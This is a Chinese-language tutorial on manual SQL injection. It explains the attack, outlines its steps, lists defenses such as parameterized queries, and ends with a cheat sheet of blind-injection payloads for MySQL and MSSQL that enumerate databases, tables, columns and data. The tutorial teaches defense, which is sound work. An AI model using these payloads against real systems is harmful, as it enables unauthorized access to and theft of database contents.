SQL注入攻击是一种常见的Web安全漏洞，它的主要原理是手动构造一些特定的SQL查询语句，使得攻击者可以绕过应用程序的身份验证和授权机制，直接访问数据库中的敏感数据。

SQL手工注入攻略

什么是SQL注入攻击

SQL注入攻击是一种常见的Web安全漏洞，它的主要原理是手动构造一些特定的SQL查询语句，使得攻击者可以绕过应用程序的身份验证和授权机制，直接访问数据库中的敏感数据。

简单来说，当Web应用程序使用不安全的方式构造SQL查询语句时，黑客可以在输入框中插入恶意的SQL代码。当应用程序未能正确处理或验证输入时，这些SQL代码就会被执行，导致应用程序的安全被破坏。

SQL注入攻击流程

SQL注入攻击的流程通常分为以下五个步骤：

1. 收集目标站点的信息：通过使用工具或手动方式，攻击者获得目标站点的结构、数据等信息。
2. 构建攻击语句：攻击者使用收集到的信息，构建包含攻击代码的SQL语句。
3. 发送SQL注入攻击：攻击者使用浏览器或其他工具，将构建好的SQL注入攻击代码发送到目标站点的服务器。
4. 执行攻击：服务器执行攻击代码并将查询结果返回给攻击者。
5. 获取敏感数据：攻击者成功获取了目标站点的敏感数据。

SQL注入攻击的防御

防御SQL注入攻击的方法主要包括以下几个方面：

1. 输入验证：对于所有输入表单应该进行合法性验证，包括字段类型、长度、格式等。禁止用户输入特殊字符（如单引号、双引号等），或者对输入进行转义。
2. 数据库权限设置：最小化应用程序的数据库连接权限，使用只读帐号、控制访问表和字段等方式限制数据库对外访问；
3. 使用参数化查询语句：可防止黑客使用SQL注入攻击；
4. 安全编码：必须熟练掌握各种编程语言安全编码技巧，严格使用预编译语句，不在数据中嵌入SQL指令；

SQL手工注入大全

针对不同的数据库类型，SQL注入攻击的方式也有所不同。下面列举了常见数据库类型下的SQL注入攻击手工注入语句：

MySQL

获取当前库名：

1' and (SELECT COUNT(*) FROM information_schema.schemata) > 0 and '1'='1
1' and (SELECT schema_name FROM information_schema.schemata LIMIT 1)='dbname' and '1'='1

获取当前表名：

1' and (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='dbname')> 0 and '1'='1
1' and (SELECT table_name FROM information_schema.tables WHERE table_schema='dbname' LIMIT 1)='tablename' and '1'='1

获取当前字段名：

1' and (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='dbname' and table_name ='tablename')> 0 and '1'='1
1' and (SELECT column_name FROM information_schema.columns WHERE table_schema='dbname' and table_name='tablename' LIMIT 1)='columnname' and '1'='1

获取当前数据：

1' and (SELECT COUNT(*) FROM tablename WHERE columnname='data') > 0 and '1'='1
SELECT columnname FROM tablename WHERE columnname='data'

MSSQL

获取当前库名：

1'; IF (SELECT COUNT(*) FROM sys.databases WHERE name like '%dbname%') > 0 SELECT @@VERSION -- '

获取当前表名：

1'; IF (SELECT COUNT(*) FROM dbname.dbo.sysobjects WHERE xtype like 'U') > 0 SELECT @@VERSION -- '
1'; IF (SELECT name FROM dbname..sysobjects WHERE xtype='U' AND name like '%tablename%') IS NOT NULL SELECT TOP 1 name FROM dbname..syscolumns WHERE id= (SELECT id FROM dbname..sysobjects WHERE name like '%tablename%') AND name LIKE '%columnname%' -- '

获取当前字段名：

1'; IF (SELECT COUNT(*) FROM dbname..syscolumns WHERE id=(SELECT id FROM dbname..sysobjects WHERE name like '%tablename%') AND name like '%columnname%') > 0 SELECT @@VERSION -- '

获取当前数据：

1';IF (SELECT TOP 1 COUNT(*) FROM dbname..tablename WHERE columnname like '%data%') > 0 SELECT @@VERSION -- '
1';IF (SELECT COUNT(*) FROM dbname..sysobjects WHERE xtype='U' AND name like '%tablename%') > 0 SELECT TOP 1 columnname FROM dbname..tablename WHERE columnname like '%data%' -- '

总结

SQL注入攻击是Web应用程序面临的最大安全威胁之一。为了保护Web应用程序的安全，必须了解SQL注入攻击的方法和防御措施，并采取相应的预防和安全措施。最好的方法是在编写Web应用程序代码和架构时遵循安全编码标准，预防SQL注入攻击。